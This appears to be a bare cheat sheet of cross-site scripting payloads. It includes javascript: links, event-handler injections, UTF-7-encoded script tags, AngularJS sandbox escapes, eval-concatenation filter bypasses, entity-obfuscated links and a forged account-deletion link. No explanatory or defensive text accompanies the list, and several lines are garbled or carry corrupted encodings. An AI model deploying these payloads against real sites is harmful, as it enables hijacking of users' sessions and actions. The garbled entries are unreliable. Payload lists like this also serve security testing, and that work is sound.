Click me]]>
testmacro
Description
<AboutBoxText><![CDATA[<a href=javascript:alert(1337)>Click me</a>]]> </AboutBoxText>
about://xss.cx
accesskey=x onclick=alert(1) 1=
“ accesskey=x onclick=alert(1) 1=’
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
a. click()
{{a=’constructor’;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,’alert(1)’)()}}
{{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(1)//’);}}
{{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1}}};alert(1)//’);}}
{{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=alert(1)’);}}
{{‘a’.constructor.prototype.charAt=’’.valueOf;$eval(“x=’\”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+\”’”);}}
<A?cript/async/src=//a?a?L>
action=//localhost/self/login.php?returnURL=changemail.php>
<a data-remote=true data-method=delete href=/delete_account>CLICK</a>
a=document.createElement(‘a’)
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
};a=eval;b=alert;a(b(12));//
‘};a=eval;b=alert;a(b(13));//
‘];a=eval;b=alert;a(b(15));//
];a=eval;b=alert;a(b(16));//
*/a=eval;b=alert;a(b(/e/.source));/*
a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
a=/ev/// .source a+=/al/// .source a[a] (name)
“><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
<!a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(2)//”>
<?a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(3)//”>
a=function(){},(p=>p.c=()=>alert(‘d’))(a.prototype),b=new a,b.c()
a=”get”;
a=\”get\”;
a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS’;);”;)”;; eval(a+b+c+d);
a=”get”; b=”URL(“”; c=”javascript:”; d=”alert(‘XSS’);”)”;eval(a+b+c+d);
a=”get”;b=”URL”;c=”javascript:”;d=”alert(1);”;eval(a+b+c+d);
a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘X10SS’);”;eval(a+b+c+d);
a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a?);
a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);
a=”get”; b=”URL(\””; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval(a+b+c+d);
a=”get”;b=”URL(\””;c=”javascript:”;d=”alert(‘XSS’);\”)”;eval(a+b+c+d);
a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e);
<% a=%><iframe/onload=alert(1)//>
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
aha <script src=>alert(/IE|Opera/)</script>
<a href=````>
a.href=’#’
<a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a>
<a href=[0x0b]” onclick=confirm(1)//”>click</a>
<a href=[0x0b]renwax23" onfocus=prompt(1) autofocus fragment=”
<a href=”javascript:alert(1)">Test</a>
<a href=”javascript:confi 14m(1)">Clickhere</a>
<a href=”javascript:confirm(1)">Clickhere</a>
<a href=”javascript:alert(1)”>CLICK ME<a>
<a href=”&#106&#97&#118&#97&& #35115&#99&#114&#105&# 912&#116&#58&#99&#111& #38#110&#102&#105&#114 8#109&#40&#49&#41">Clickhere</a>
<a href=”&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>